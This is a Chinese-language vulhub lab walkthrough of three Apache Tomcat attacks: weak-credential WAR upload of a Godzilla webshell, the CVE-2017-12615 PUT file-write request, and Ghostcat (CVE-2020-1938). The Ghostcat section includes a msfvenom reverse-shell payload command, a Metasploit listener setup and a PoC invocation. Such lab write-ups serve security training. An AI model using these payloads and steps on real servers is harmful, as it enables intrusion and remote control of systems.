进入vulhub靶场,使用docker-compose一键启动我们的环境
弱口令
根据README文件操作
# Tomcat7+ 弱口令 && 后台getshell漏洞
Tomcat版本:8.0
## 环境说明
Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。
Tomcat7+权限分为:
- manager(后台管理)
- manager-gui 拥有html页面权限
- manager-status 拥有查看status的权限
- manager-script 拥有text接口的权限,和status权限
- manager-jmx 拥有jmx权限,和status权限
- host-manager(虚拟主机管理)
- admin-gui 拥有html页面权限
- admin-script 拥有text接口权限
这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html
在`conf/tomcat-users.xml`文件中配置用户的权限:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<role rolename="admin-gui"/>
<role rolename="admin-script"/>
<user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
</tomcat-users>
```
可见,用户tomcat拥有上述所有权限,密码是`tomcat`。
正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。
## 漏洞测试
无需编译,直接启动整个环境:
```
docker compose up -d
```
打开tomcat管理页面`http://your-ip:8080/manager/html`,输入弱密码`tomcat:tomcat`,即可访问后台:
上传war包即可直接getshell。直接进入以下页面
用哥斯拉生成一个jsp的后门
使用配置好的java环境将生成的后门a.jsp制作成a.war的压缩包
上传war包
用哥斯拉连接,后门路径为ip+端口号+war的文件名+jsp的文件名.jsp
拿到shell
CVE-2017-12615
阅读README文件
# Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
Tomcat版本:8.5.19
## 环境搭建
```
docker compose build
docker compose up -d
```
运行完成后访问`http://your-ip:8080`即可看到Tomcat的Example页面。
## 漏洞原理
参考:
- http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
- https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
- https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e
漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:
```
<servlet>
<servlet-name>default</servlet-name>
<servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>listings</param-name>
<param-value>false</param-value>
</init-param>
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>
<load-on-startup>1</load-on-startup>
</servlet>
```
虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用`/`)来绕过了限制。
## 漏洞复现
直接发送以下数据包即可在Web根目录写入shell:
```
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
shell
```
如下:
访问结果如下:
进入容器我们可以看到是false的
docker exec -it 容器id /bin/bash
cat conf/web.xml | grep readonly
刷新当前界面抓包,修改请求方式get改为put,并写入webshell
打开webshell测试连接
拿shell
CVE-2020-1938
阅读README文件
# Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)
Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。
[Ghostcat(幽灵猫)](https://www.chaitin.cn/zh/ghostcat) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
参考链接:
- https://www.chaitin.cn/zh/ghostcat
- https://www.cnvd.org.cn/webinfo/show/5415
- https://mp.weixin.qq.com/s/D1hiKJpah3NhEBLwtTodsg
- https://mp.weixin.qq.com/s/GzqLkwlIQi_i3AVIXn59FQ
## 漏洞环境
执行如下命令启动一个Tomcat 9.0.30:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。
## 漏洞利用
利用官方网站在线测试:
利用如下工具均可测试漏洞:
- https://github.com/chaitin/xray
- https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
默认页面
通过nmap扫描端口发现8009开启
打开靶机kail在桌面生成一个msf木马
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.31 LPORT=6666 > shell.txt
将生成的木马复制到tomcat目录下,模拟我们已经将shell.txt上传
docker cp /home/kail/Desktop/shell.txt 容器id:/usr/local/tomcat/webapps/ROOT/WEB-INF/shell.txt
在攻击机下载poc
git clone https://github.com/sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read/
在攻击机打开msf进行监听
# 打开msf
msfconsole
# 设置监听模块
use exploit/multi/handler
# 设置 payload
set payload java/jsp_shell_reverse_tcp
# 设置监听 IP 地址
set lhost 192.168.101.31
# 设置监听端口
set lport 6666
# 执行
run
在攻击机访问shell.txt,使shell.txt发生文件包含
python2 Tomcat-ROOT路径下文件包含(CVE-2020-1938).py 192.168.101.31 -p 8009 -f /WEB-INF/shell.txt 
可以看到监听的6666端口收到了信息,正如README文件提到的,如果我们上传的是jsp文件,就已经拿到shell
Comments NOTHING